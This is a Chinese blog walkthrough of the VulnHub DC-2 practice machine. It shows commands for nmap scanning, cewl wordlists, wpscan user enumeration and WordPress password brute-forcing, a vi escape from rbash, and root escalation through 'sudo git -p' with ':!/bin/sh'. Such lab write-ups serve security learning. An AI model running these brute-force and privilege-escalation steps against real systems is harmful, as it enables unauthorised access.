vulnhub靶场 DC-2

最新推荐文章于 2022-10-27 21:26:04 发布
最新推荐文章于 2022-10-27 21:26:04 发布
阅读量518 收藏 1
点赞数 1
文章标签: linux 网络 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52221158/article/details/126581685
版权

目录

下载

开始

hosts文件进行修改

cewl抓取

使用wpscan进行用户爆破

dirb爆破网页目录

 ssh连接

 vi绕过

git提权

注:本文涉及到的一些知识都在下载后的dc-2.md文件中,文章不逐一讲解,或者私信

下载

链接:https://pan.baidu.com/s/1DJVYxhyoetIEAhyDtYikpg 
提取码:i53s

.ova文件导入,.md文件为涉及到的一些知识

开始

注意靶场网络配置与kali相同,启动靶机

查看kali的IP

使用nmap找到靶机ip,然后进行端口详细扫描

发现开启了80端口,还有一个可能将22端口改为7744的ssh服务,还发现网页进行了重定向

hosts文件进行修改

vi /etc/hosts        //修改hosts文件

 访问IP192.168.80.130,提示为wordpress的框架

提示使用cewl网页抓取,并说可能使用某个特定账户才能登录

cewl抓取

cewl http://dc-2 > pass.txt

使用wpscan进行用户爆破

wpscan --url http://dc-2 -e u

运行wpscan报错Could not find 'nokogiri' (~> 1.8.0) - 码农教程

解决报错问题

爆破出三个用户,将这些用户写入某个文件,当作下来爆破的用户字典 

wpscan --url -P passwdspath -U userspath

adipiscing        parturient

dirb爆破网页目录

dirb http://dc-2        找到后台用爆破的账号密码登录,发现用jerry用户即可


 

 找到flag2,提示换一种方式,想到之前的ssh

 ssh连接

tom登录,得到flag3

 

 看到rbash,了解一些命令被禁用

我们需要查看可用命令        ls /home/tom/usr/bin

 vi绕过

vi
:set shell=/bin/sh //给shell赋值
:shell //执行shell
逃逸成功后发现命令还是无法执行
我们查看PATH变量

发现,这是路径的问题,我们需要修改路径
export PATH=PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin:sbin
然后就可以进行操作了

 flag3提示切换用户,我们切换为jerry

su jerry

再回到主目录,找到flag4,提示git提权 

git提权

 sudo -l         //授权查看,看到git

sudo git -p        //因为分页查看才能输入命令,所以将框距调小
:!/bin/sh         //shell转义,所以要避免sudo授权用户使用vi,vim,ftp.lee,more,git….
cd /root

ls

 

 

安全的小白
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
安装nokogiri 以及gem 的时候错误总结
desword-- 技术,杂文。
07-27 6262
1、第一个错误信息 ============================================================================== ERROR:  Error installing nokogiri: ERROR: Failed to build gem native extension.         /usr/bin/ruby1.9.
Wpscan更新报错的问题,以及使用
weixin_47112073的博客
10-27 1321
这两天练习web渗透的时候了解到了WPScan这么个工具,想利用它来扫描一些网站的时候发现它一直报错,发现是更新失败的问题,于是在此记录一下解决方案。
Vulnhub DC Challenges之 DC-2
ST0new的博客
05-26 1887
前言 关于Vulnhub 以及DC,以及如何使用ova安装,我已经在DC-1中介绍了 ,今天带来第二弹,比第一弹难度稍微大一点,重点还是考察工具的使用和命令的熟练程度 附上链接Vulnhub DC Challenges之 DC-1 DC-2介绍 DC-2,我们主要是从web入手渗透拿到flag,需要大家对信息收集要有一定的了解,需要掌握的工具:nmap,hydra,cewl。 靶机环境 DC-2...
Vulnhub dc-2靶机 详解 易懂
Lee_yc的博客
08-21 482
​ 下载地址:DC: 2 ~ VulnHub 下载完成后直接使用虚拟机打开就可以了,注意把靶机设置为NAT模式
vulnhub--DC2
weixin_55129870的博客
05-12 1222
环境:kali、DC2靶机 DC2靶机默认桥接模式,开启前改成net模式,保证kali和DC2在同一局域网中。(也可都是桥接模式,我比较习惯net模式) ifconfig查看kaliIP地址:192.168.44.131 查看C段,准备C段扫描,在虚拟机编辑--虚拟网络编辑器中, 得知网段192.168.44.0/24,使用nmap扫描存活主机 nmap -sP 192.168.44.0/24 #扫描IP段的所有IP地址 一般都会扫描出5个存活主机,出去较大的,较小的,得知.
vulnhub靶场实战系列-DC-3实战
最新发布
05-20
vulnhub靶场实战系列-DC-3实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场实战系列-DC-1实战流程图
05-17
Could not find ‘ffi‘ (>= 1.3.0) among 117 total gem(s) (Gem::MissingSpecError) Checked in ‘GEM_PATH=
zhaosuningzsn的博客
08-24 1534
pod install 安装报错 Could not find ‘ffi’ (>= 1.3.0) among 117 total gem(s) (Gem::MissingSpecError) Checked in ‘GEM_PATH=/Users/zhaosn/.rvm/gems/ruby-3.0.0:/Users/zhaosn/.rvm/rubies/ruby-3.0.0/lib/ruby/gems/3.0.0’, execute gem env for more information 经分析,
Vulnhub-DC-2实战靶场
ierciyuan的博客
10-27 1522
vulnhubdc-2靶场。信息收集、漏洞利用等,详细的分步打靶。
Vulnhub-DC-2靶机实战
御七彩虹猫
03-28 3867
Vulnhub-DC-2靶机实战
vulnhub靶机试炼场之DC-2
Mrs_H的博客
10-26 236
前言 距离上次更新靶机渗透的文章已经过了半个月了,这半个月里面一直在打CTF或者是靶场,没有时间做新的靶机。事先说明,这篇靶机的渗透文章是大概一个多月前的作品了。今天刚好有时间,所以就拿出一点时间来整理一下。也当是为了下一个靶机进行复习了。这一个月里面只要没有太多的比赛,漏洞复现去做,应该能更新DC-3吧(应该)。 正文 这次的行文思路不是是跟着flag的次序而是跟着渗透测试过程的来走的。 flag1 先用nmap扫下当前网站up状态的主机,目的是扫出目标靶机 发现主机只是第一步,接下来我们对该靶机进行全
Vulnhub靶机:DC-2渗透详细过程
IerkeU的博客
01-30 3490
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第二台,下载地址为DC: 2 ~ VulnHub。该靶机的难度系数为简单,和DC1一样,总共有五个flag。 DC-2与DC-1一样,是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具)
各版本OS安装wpscan
问君能有几多愁,恰似一江春水向东流
05-06 3618
Installing on Debian/Ubuntu: sudo apt-get install libcurl4-gnutls-dev libopenssl-ruby libxml2 libxml2-dev libxslt1-dev ruby-dev git clone https://github.com/wpscanteam/wpscan.git cd wpscan sudo
kali使用wpscan报错ruby: No such file or directory
thdxs的专栏
06-14 3295
kali里用wpscan报错如下: ruby: No such file or directory – ./wpscan.rb (LoadError) 解决办法: cd /usr/share/wpscan then type : ruby ./wpscan.rb –url www.example.com
Vulnhub系列之DC2靶场详解
weixin_50053818的博客
05-05 1689
TOC {:toc} 环境 DC-1靶场 VMware虚拟机 kali 直接更改域名解析进网站拿flag1 根据目标靶场的MAC地址得出IP为:192.168.31.182,直接上nmap扫描。 可以发现开放了80端口,网页服务器但是可以看出做了域名解析,所以需要在本地即kali的配置文件/etc/hosts文件写入192.168.31.182 dc-2即可完成本地域名解析。还可以看出网站是由WordPress内容管理系统搭建的。 还开放了7744端口,可以知道使用协议是ssh,所以可以远程连接。 .
Vulnhub 靶机实战系列:DC -2
weixin_45752674的博客
05-31 293
Vulnhub 靶机实战系列:DC -2 arp-scan -l IPv4: 192.168.175.134 VMware ip:192.168.175.135 nmap -A 192.168.175.135 80/tcp open vim /etc/hosts Flag 1: Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl. More passwords is al
vulnhub靶场通关
09-09
vulnhub靶场是一个用于学习和测试网络安全技能的平台。通关vulnhub靶场需要进行一系列的渗透测试和漏洞利用操作。根据引用中提供的目录,以下是一个通关vulnhub靶场的大致步骤: 1. 环境搭建:下载靶场环境,并启动...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值